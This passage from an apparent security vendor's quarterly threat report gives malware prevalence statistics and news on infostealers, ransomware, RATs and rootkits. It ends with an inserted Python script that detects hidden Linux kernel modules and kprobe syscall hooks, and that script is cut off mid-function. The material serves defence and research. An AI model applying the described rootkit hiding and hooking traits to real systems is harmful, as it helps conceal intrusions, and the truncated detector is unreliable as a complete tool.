  3745. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1024x639.png" alt="" class="wp-image-7958" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/3_map_2023_Q4_malware_infostealer_31_2023-10-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Map showing global risk ratio for information stealers in Q4/2023</figcaption></figure></div>
  3746.  
  3747.  
  3748. <p>Unsurprisingly, AgentTesla still holds its place as the most popular information stealer, capturing 26% of the global information stealer market share. However, this share is lower than in the previous quarter due to an 11% decrease. Formbook also experienced a 10% decrease in market share and now holds 10%. Unfortunately, various JavaScript scrapers/exfilware were also far more active this quarter, now marking a 6.08% market share.</p>
  3749.  
  3750.  
  3751.  
  3752. <p>According to our data, Raccoon stealer had another rough couple of months, losing an additional 21% of its market share, for a current total of 1.54%.</p>
  3753.  
  3754.  
  3755.  
  3756. <p>The most common information stealers with their malware shares in Q4/2023 were:</p>
  3757.  
  3758.  
  3759.  
  3760. <ul>
  3761. <li>AgentTesla (26%)</li>
  3762.  
  3763.  
  3764.  
  3765. <li>FormBook (10%)</li>
  3766.  
  3767.  
  3768.  
  3769. <li>Fareit (6%)</li>
  3770.  
  3771.  
  3772.  
  3773. <li>RedLine (4%)</li>
  3774.  
  3775.  
  3776.  
  3777. <li>Lokibot (3%)</li>
  3778.  
  3779.  
  3780.  
  3781. <li>Lumma (3%)</li>
  3782.  
  3783.  
  3784.  
  3785. <li>Stealc (2%)</li>
  3786.  
  3787.  
  3788.  
  3789. <li>OutSteel (2%)</li>
  3790.  
  3791.  
  3792.  
  3793. <li>ViperSoftX (2%)</li>
  3794.  
  3795.  
  3796.  
  3797. <li>Raccoon (2%)</li>
  3798. </ul>
  3799.  
  3800.  
  3801.  
  3802. <p class="has-text-align-right"><em>Jan Rubín, Malware Researcher</em></p>
  3803.  
  3804.  
  3805.  
  3806. <h3 class="wp-block-heading">Ransomware</h3>
  3807.  
  3808.  
  3809.  
  3810. <p><em>Ransomware is any type of extorting malware. The most common subtype is the one that encrypts documents, photos, videos, databases, and other files on the victim’s PC. Those files become unusable without decrypting them first. To decrypt the files, attackers demand money, “ransom”, hence the term ransomware.</em></p>
  3811.  
  3812.  
  3813.  
  3814. <p>Hacks, breaches, stolen data. Almost every day, <a href="https://www.bleepingcomputer.com/tag/ransomware/" target="_blank" rel="noreferrer noopener">we can read about a new data breach</a> or data extortion campaign from one of the many ransomware gangs. The intensity and frequency are stunning; for example, the LockBit data leak site showed 65 new attacked companies in 15 days (from Oct 23 to Nov 7, 2023). That is more than 4 new companies attacked each day!</p>
  3815.  
  3816.  
  3817. <div class="wp-block-image">
  3818. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="726" height="259" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/001-ransomware-lockbit-victims-15-days.png" alt="" class="wp-image-7960" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/001-ransomware-lockbit-victims-15-days.png 726w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/001-ransomware-lockbit-victims-15-days-300x107.png 300w" sizes="(max-width: 726px) 100vw, 726px" /><figcaption class="wp-element-caption">List of companies attacked by LockBit in 15 days (Oct 23-Nov 7, 2023)</figcaption></figure></div>
  3819.  
  3820.  
  3821. <p>As of the time of writing this article, the site lists 217 companies that were allegedly attacked, which makes LockBit the most active ransomware gang worldwide.</p>
  3822.  
  3823.  
  3824.  
  3825. <p>However, law enforcement organizations do not sleep either. In a joint operation, the Dutch Police and Cisco Talos recovered a <a href="https://blog.talosintelligence.com/decryptor-babuk-tortilla/" target="_blank" rel="noreferrer noopener">decryption tool</a> of the Babuk ransomware used in the <a href="https://twitter.com/VirITeXplorer/status/1448689555083780101" target="_blank" rel="noreferrer noopener">Tortilla malicious campaign</a>. Avast added the recovered private key into its Babuk decryptor, which is now <a href="https://decoded.avast.io/threatresearch/avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police/" target="_blank" rel="noreferrer noopener">available for download</a>.</p>
  3826.  
  3827.  
  3828.  
  3829. <p>Furthermore, several ransomware operations were disrupted in the previous quarter, such as BlackCat / ALPHV, which is the world’s second most active gang.</p>
  3830.  
  3831.  
  3832.  
  3833. <p>On Dec 7, 2023, <a href="https://twitter.com/malwrhunterteam/status/1732705297452405033" target="_blank" rel="noreferrer noopener">information</a> appeared that BlackCat’s leak site was down. Even though BlackCat operators looked like they were repairing the site, one day later it appeared that the FBI was <a href="https://twitter.com/evangeorgevoug/status/1733016196717629571" target="_blank" rel="noreferrer noopener">behind the outage</a> of the data site:</p>
  3834.  
  3835.  
  3836. <div class="wp-block-image">
  3837. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="818" height="802" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/003-ransomware-blackcat-down-due-to-an-FBI-visit.png" alt="" class="wp-image-7961" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/003-ransomware-blackcat-down-due-to-an-FBI-visit.png 818w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/003-ransomware-blackcat-down-due-to-an-FBI-visit-300x294.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/003-ransomware-blackcat-down-due-to-an-FBI-visit-768x753.png 768w" sizes="(max-width: 818px) 100vw, 818px" /><figcaption class="wp-element-caption">Tweet informing about possible FBI operation on BlackCat gang</figcaption></figure></div>
  3838.  
  3839.  
  3840. <p>Ten days later, the Department of Justice officially confirmed that the <a href="https://www.justice.gov/opa/pr/justice-department-disrupts-prolific-alphvblackcat-ransomware-variant" target="_blank" rel="noreferrer noopener">ransomware gang operation was disrupted</a> and the site was seized. The leak site now shows information about the successful law enforcement operation conducted by the FBI:</p>
  3841.  
  3842.  
  3843. <div class="wp-block-image">
  3844. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="631" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/004-ransomware-blackcat-site-seized-1024x631.png" alt="" class="wp-image-7962" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/004-ransomware-blackcat-site-seized-1024x631.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/004-ransomware-blackcat-site-seized-300x185.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/004-ransomware-blackcat-site-seized-768x473.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/004-ransomware-blackcat-site-seized.png 1496w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Seized website of the BlackCat / ALPHV ransomware</figcaption></figure></div>
  3845.  
  3846.  
  3847. <p>Good employees are a scarce resource; that applies to dark-side employers as well. Hence, as soon as the rumors about BlackCat began, LockBit operators <a href="https://twitter.com/g0njxa/status/1734510597201404361" target="_blank" rel="noreferrer noopener">started to recruit</a> members of the BlackCat gang.</p>
  3848.  
  3849.  
  3850.  
  3851. <p>The disruption operation did not stop BlackCat, however. New organizations have been attacked by the gang already <a href="https://twitter.com/CyberNews/status/1744716905632477222" target="_blank" rel="noreferrer noopener">in 2024</a>.</p>
  3852.  
  3853.  
  3854.  
  3855. <h6 class="wp-block-heading">Statistics</h6>
  3856.  
  3857.  
  3858.  
  3859. <p>The following stats show the most prevalent ransomware strains among our userbase. Percentages show the malware share of each strain:</p>
  3860.  
  3861.  
  3862.  
  3863. <ul>
  3864. <li>STOP (17%)</li>
  3865.  
  3866.  
  3867.  
  3868. <li>WannaCry (16%)</li>
  3869.  
  3870.  
  3871.  
  3872. <li>Enigma (9%)</li>
  3873.  
  3874.  
  3875.  
  3876. <li>TargetCompany (4%)</li>
  3877.  
  3878.  
  3879.  
  3880. <li>Cryptonite (2%)</li>
  3881.  
  3882.  
  3883.  
  3884. <li>LockBit (1%)</li>
  3885. </ul>
  3886.  
  3887.  
  3888.  
  3889. <p>This quarter, Enigma is the highest jumper, going up from 1% to over 9%. The complete world map with risk ratios is as follows:</p>
  3890.  
  3891.  
  3892. <div class="wp-block-image">
  3893. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-1024x639.png" alt="" class="wp-image-7963" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/005-ransomware-risk-ratio-Q4-2023-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Ransomware risk ratio in our userbase in Q4/2023</figcaption></figure></div>
  3894.  
  3895.  
  3896. <p>Since the previous quarter, the risk ratio in our user base shows a slight increase:</p>
  3897.  
  3898.  
  3899. <div class="wp-block-image">
  3900. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-1024x404.png" alt="" class="wp-image-7964" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/006-ransomware-risk-ratio-Q3-Q4-2023-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Comparison of the ransomware risk ratio in Q3/2023 and Q4/2023</figcaption></figure></div>
  3901.  
  3902.  
  3903. <p class="has-text-align-right"><em>Ladislav Zezula, Malware Researcher</em><br><em>Jakub Křoustek, Malware Research Director</em></p>
  3904.  
  3905.  
  3906.  
  3907. <h3 class="wp-block-heading">Remote Access Trojans (RATs)</h3>
  3908.  
  3909.  
  3910.  
  3911. <p><em>A Remote Access Trojan (RAT) is a type of malicious software that allows unauthorized individuals to gain remote control over a victim&#8217;s computer or device. RATs are typically spread through social engineering techniques, such as phishing emails or infected file downloads. Once installed, RATs grant the attacker complete access to the victim&#8217;s device, enabling them to execute various malicious activities, such as spying, data theft, remote surveillance, and even taking control of the victim&#8217;s webcam and microphone.</em></p>
  3912.  
  3913.  
  3914.  
  3915. <p>Things in the realm of remote access trojans did not change much in Q4/2023. Regarding the daily activity of RATs, the statistics show a slightly decreasing trend when compared to Q3/2023, but this might be due to the holiday season, when targeted users and RAT operators alike enjoy the time off.</p>
  3916.  
  3917.  
  3918.  
  3919. <p>An exciting event this year was the takedown of NetWire RAT in Q1/2023. Let us look at what effect this takedown had on one of the bigger players at that time. Before the takedown, in Q4/2022, NetWire RAT was number 7 on the most prevalent list, taking up over 4% of the malware share among RATs. In Q1/2023 its malware share went down to 3%; the takedown happened at the beginning of March, so its impact was not yet visible in that quarter. In Q2/2023 the share dropped further to 1.2%, and in the second half of 2023 the malware share stayed at 1%, rendering NetWire RAT nearly irrelevant. We do not expect this strain to return to its earlier status.</p>
  3920.  
  3921.  
  3922. <div class="wp-block-image">
  3923. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1024x404.png" alt="" class="wp-image-7965" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rat-daily_hits_normalized_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Daily risk ratio in our user base on RATs in Q4/2023</figcaption></figure></div>
  3924.  
  3925.  
  3926. <p>According to our data, Remcos seems to be the deciding factor in the risk ratio of each country, while other strains have much smaller effects. The only exceptions are countries where HWorm is spread, which is mainly the Middle East and Afghanistan, Pakistan, and India. As usual, the highest values of risk ratio are in Afghanistan, Iraq and Yemen, and the factors are the activity of HWorm and, to a far lesser extent, the activity of njRAT. The largest increase in risk ratio in this quarter was seen in Romania (78%, Remcos and QuasarRAT), Lithuania (49%, Remcos, njRAT and Warzone) and Czechia (46%, Remcos and njRAT). North Macedonia, Uruguay and Portugal are the countries with the largest decrease in risk ratio (-50%), which correlates with decreased activity of Remcos.</p>
  3927.  
  3928.  
  3929. <div class="wp-block-image">
  3930. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1024x639.png" alt="" class="wp-image-7966" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rat-map_2023_Q4_malware_rat_31_2023-10-01—2023-12-31-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Map showing global risk ratio for RATs in Q4/2023</figcaption></figure></div>
  3931.  
  3932.  
  3933. <p>We have <a href="https://x.com/AvastThreatLabs/status/1722195788758220824" target="_blank" rel="noreferrer noopener">tweeted</a> about one of the Remcos campaigns tricking users into installing fake Adobe Reader updates. Remcos was very active in October and then somewhat slowed down in November and December. We have also published a <a href="https://x.com/AvastThreatLabs/status/1722953843208577257" target="_blank" rel="noreferrer noopener">tweet</a> about another campaign using fake updates, this time pushing zgRAT, which according to our data is otherwise not very widespread.</p>
  3934.  
  3935.  
  3936.  
  3937. <p>AsyncRat, currently number 4 on the top prevalent list, has increased its malware share by 30%. There are also two strains which more than doubled their malware share. One of these is XWorm, which entered the top 10 list this quarter. The other is SectopRAT, which isn&#8217;t as prevalent; however, there are reports of it working together with the Lumma password stealer.</p>
  3938.  
  3939.  
  3940.  
  3941. <p>The most prevalent remote access trojan strains in our userbase:</p>
  3942.  
  3943.  
  3944.  
  3945. <ul>
  3946. <li>HWorm</li>
  3947.  
  3948.  
  3949.  
  3950. <li>Remcos</li>
  3951.  
  3952.  
  3953.  
  3954. <li>njRAT</li>
  3955.  
  3956.  
  3957.  
  3958. <li>AsyncRat</li>
  3959.  
  3960.  
  3961.  
  3962. <li>QuasarRAT</li>
  3963.  
  3964.  
  3965.  
  3966. <li>Warzone</li>
  3967.  
  3968.  
  3969.  
  3970. <li>FlawedAmmyy</li>
  3971.  
  3972.  
  3973.  
  3974. <li>NanoCore</li>
  3975.  
  3976.  
  3977.  
  3978. <li>Gh0stCringe</li>
  3979.  
  3980.  
  3981.  
  3982. <li>XWorm</li>
  3983. </ul>
  3984.  
  3985.  
  3986.  
  3987. <p>The discovery of Krasue was probably the most frequent news topic in December. Krasue is a new Linux RAT discovered by <a href="https://www.group-ib.com/blog/krasue-rat/" target="_blank" rel="noreferrer noopener">Group-IB</a>. According to their report, this threat has been active since at least 2021 targeting organizations in Thailand. The malware holds a rootkit to hide its presence on a system, more specifically it contains 7 precompiled versions for various kernels. Another interesting feature is the use of the RTSP (Real Time Streaming Protocol) for C2 communication which is not very common.</p>
  3988.  
  3989.  
  3990. <div class="wp-block-image">
  3991. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="669" height="538" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rat-krasue.png" alt="" class="wp-image-7967" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rat-krasue.png 669w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rat-krasue-300x241.png 300w" sizes="(max-width: 669px) 100vw, 669px" /><figcaption class="wp-element-caption">Embedded rootkit versions in Krasue</figcaption></figure></div>
  3992.  
  3993.  
  3994. <p>The <a href="https://blog.talosintelligence.com/new-sugargh0st-rat/" target="_blank" rel="noreferrer noopener">Cisco Talos</a> team recently spotted a new customized variant of Gh0st RAT. They call this variant SugarGh0st. Gh0st RAT is an old RAT whose code was publicly released in 2008, and over the years it has been frequently used by Chinese-speaking actors. Talos argues, although with low confidence, that a Chinese-speaking group might be running the current campaign as well. Among the features added compared to the original Gh0st RAT are a search for specific ODBC (Open Database Connectivity) registry keys, loading of library files, changes made to evade earlier detections, and a slight modification of the C2 communication protocol. This is interesting evidence that although there are frequent reports of new RATs, the old and reliable ones are here to stay.</p>
  3995.  
  3996.  
  3997.  
  3998. <p>Two more strains were reported by CYFIRMA, namely the <a href="https://www.cyfirma.com/outofband/unveiling-a-new-threat-the-millenium-rat/" target="_blank" rel="noreferrer noopener">Millenium RAT</a> and <a href="https://www.cyfirma.com/outofband/a-gamer-turned-malware-developer-diving-into-silverrat-and-its-syrian-roots/" target="_blank" rel="noreferrer noopener">SilverRAT</a>. The Millenium RAT briefly appeared for sale on GitHub. It is interesting to note that the release on GitHub specified version 2.4, and version 2.5 followed shortly after. We were not able to find any reports or clues pointing to earlier versions. This might mean that 2.4 was the first version to go public, or that it had been flying under the radar until now. CYFIRMA researchers said that this RAT is probably a derivative of the ToxicEye RAT. Regarding its features, it has the full package expected in a commodity RAT, including keylogging, stealing sensitive data, and running commands.</p>
  3999.  
  4000.  
  4001.  
  4002. <p>SilverRAT seems to be a continuation of the S500 RAT, since according to CYFIRMA it was developed by the same authors. This RAT is not new; it was first shared in 2022, but in Q4/2023 its cracked source code was leaked.</p>
  4003.  
  4004.  
  4005.  
  4006. <p class="has-text-align-right"><em>Ondřej Mokoš, Malware Researcher</em></p>
  4007.  
  4008.  
  4009.  
  4010. <h3 class="wp-block-heading">Rootkits</h3>
  4011.  
  4012.  
  4013.  
  4014. <p><em>Rootkits are malicious software specifically designed to gain unauthorized access to a system and obtain high-level privileges. Rootkits can operate at the kernel layer of a system, which grants them deep access and control including the ability to modify critical kernel structures. This could enable other malware to manipulate system behavior and evade detection.</em></p>
  4015.  
  4016.  
  4017.  
  4018. <p>The year-long analysis of rootkit activity reveals persistent stagnation with a subtle descending trend. A minor peak was found in the middle of Q4/2023, although its significance is minimal.</p>
  4019.  
  4020.  
  4021. <div class="wp-block-image">
  4022. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-1024x404.png" alt="" class="wp-image-7968" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/01-rootkits-2023_Q3-Q4_malware_rootkit-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Rootkit risk ratio in Q3/2023 – Q4/2023</figcaption></figure></div>
  4023.  
  4024.  
  4025. <p>Notably, China consistently keeps its prominent position as the leader in rootkit activity.</p>
  4026.  
  4027.  
  4028. <div class="wp-block-image">
  4029. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-1024x639.gif" alt="" class="wp-image-7969" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-1024x639.gif 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-300x187.gif 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-768x479.gif 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-1536x958.gif 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/02-rootkits-map_2023_Q4-Q3_malware_rootkit-2048x1278.gif 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global risk ratio for rootkits in Q3 and Q4 2023</figcaption></figure></div>
  4030.  
  4031.  
  4032. <p>Despite a consistent overall trend, an expansion in affected states is seen, particularly in Europe and Russian regions. Furthermore, a noteworthy occurrence in the Russian territory during the middle of the third quarter extended into the fourth quarter.</p>
  4033.  
  4034.  
  4035. <div class="wp-block-image">
  4036. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-1024x404.png" alt="" class="wp-image-7970" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/03-rootkits-RU_2023_Q4_malware_rootkit-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Rootkit risk ratio in Q3/2023 – Q4/2023 in Russian territory</em></figcaption></figure></div>
  4037.  
  4038.  
  4039. <p>For several years, the dominant rootkit in the wild has been R77, a trend supported by comprehensive data displayed in a graph illustrating the prevalence of all rootkits, with a specific focus on R77.</p>
  4040.  
  4041.  
  4042. <div class="wp-block-image">
  4043. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-1024x404.png" alt="" class="wp-image-7971" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2024/02/04-rootkits-2023_Q4_malware_rootkits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Global rootkit activity vs. R77Rootkit in Q4/2023</figcaption></figure></div>
  4044.  
  4045.  
4046. <p>We expect R77 to remain the most widespread rootkit for the foreseeable future. Its popularity stems from its uncomplicated design: it runs entirely in user mode (ring 3) yet offers the core hiding functionality of a classic kernel-mode (ring 0) rootkit, which spares its operators the frequent Blue Screen of Death (BSOD) crashes that buggy kernel drivers cause.</p>
  4047.  
  4048.  
  4049.  
4050. <p>Additionally, approximately 20% of the rootkits we see are standard tools, often used as support components for other malware. The most prevalent rootkit strains in Q4/2023 were:</p>
  4051.  
  4052.  
  4053.  
  4054. <ul>
  4055. <li>R77Rootkit (48%)</li>
  4056.  
  4057.  
  4058.  
  4059. <li>Pucmeloun (7%)</li>
  4060.  
  4061.  
  4062.  
  4063. <li>Alureon (5%)</li>
  4064.  
  4065.  
  4066.  
  4067. <li>Bootkor (3%)</li>
  4068.  
  4069.  
  4070.  
  4071. <li>Perkesh (3%)</li>
  4072.  
  4073.  
  4074.  
  4075. <li>Cerbu (2%)</li>
  4076. </ul>
  4077.  
  4078.  
  4079.  
4080. <p>In terms of Linux kernel rootkits, we continue tracking the cyberweapons of APT groups. For instance, we detected <a href="https://www.virustotal.com/gui/file/ccb32eef05aa570be137c6eb597776f6242010c181eb2eb4b7f1ccd7b10ad379" target="_blank" rel="noreferrer noopener">new samples</a> of the Mélofée Linux kernel rootkit used by Chinese APT groups.</p>
  4081.  
  4082.  
  4083.  
4084. <p>We also observed similar TTPs in other samples (e.g. a <a href="https://www.virustotal.com/gui/file/990d33391f88ca19207c0a780ddf12c2fff72bc43d5a0a01baceb39172637112" target="_blank" rel="noreferrer noopener">Diamorphine kernel rootkit variant</a>): simple functionality (hiding the module itself and the directories holding the malicious content), hooks implemented on top of KProbes (note that <a href="https://github.com/milabs/khook/blob/master/khook/internal.h#L12" target="_blank" rel="noreferrer noopener">KHook relies on KProbes</a>), compilation on Amazon Linux distributions, and module names impersonating popular hardware manufacturers (e.g. Intel and Realtek).</p>
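<p>Two of the traits just described can be checked from user space. A module that unlinks itself from the kernel's module list disappears from <code>/proc/modules</code> but, unless it also tears down its kobject, keeps its directory under <code>/sys/module/&lt;name&gt;</code>; and every registered kprobe, with the symbol it sits on, is listed in <code>/sys/kernel/debug/kprobes/list</code> (that file names the module containing the probed symbol, not the module that registered the probe, so a hook on a core-kernel syscall shows no owner at all). The following Python script is an added example of triaging snapshots of those files; it is not code from the report or from the rootkit authors. The module name <code>rtl8xxx_nic</code>, the addresses and all snapshot contents are constructed for the example, and the list of sensitive syscall symbols is an assumption based on what Diamorphine-style rootkits typically hook.</p>

```python
"""Offline triage for lightweight Linux kernel rootkits that unlink their module
from the kernel's module list and hook syscalls with KProbes.

It works on snapshots of three pseudo-files, so it can run against data copied
off a suspect host (all sample data below is constructed for this example):
  /proc/modules                   - the list a rootkit typically unlinks itself from
  /sys/module/<name>/initstate    - per-module sysfs entries simple rootkits leave behind
  /sys/kernel/debug/kprobes/list  - every registered kprobe and the symbol it sits on
"""
import os
from dataclasses import dataclass
from typing import List, Optional, Set

# Syscall entry points that file/process-hiding rootkits (Diamorphine and its
# variants among them) typically hook.  Assumption: x86_64 symbol names.
SENSITIVE_SYMBOLS = {"__x64_sys_getdents", "__x64_sys_getdents64", "__x64_sys_kill"}


@dataclass(frozen=True)
class Kprobe:
    address: str
    kind: str                 # 'k' = kprobe, 'r' = kretprobe
    symbol: str
    offset: int
    module: Optional[str]     # module containing the probed symbol; None for core kernel
    flags: str                # concatenated, e.g. '[OPTIMIZED][FTRACE]', '[GONE]', '[DISABLED]'


def parse_kprobes_list(text: str) -> List[Kprobe]:
    """Parse '<addr>  <k|r>  <symbol>+0x<off>  <module-or-blank> <flags>' lines."""
    entries = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        address, kind, sym_off = parts[:3]
        if "+0x" in sym_off:
            symbol, off_hex = sym_off.rsplit("+0x", 1)
            offset = int(off_hex, 16)
        else:
            symbol, offset = sym_off, 0
        rest = parts[3:]
        module = None
        if rest and not rest[0].startswith("["):   # flags are bracketed, module names are not
            module = rest.pop(0)
        entries.append(Kprobe(address, kind, symbol, offset, module, "".join(rest)))
    return entries


def parse_proc_modules(text: str) -> Set[str]:
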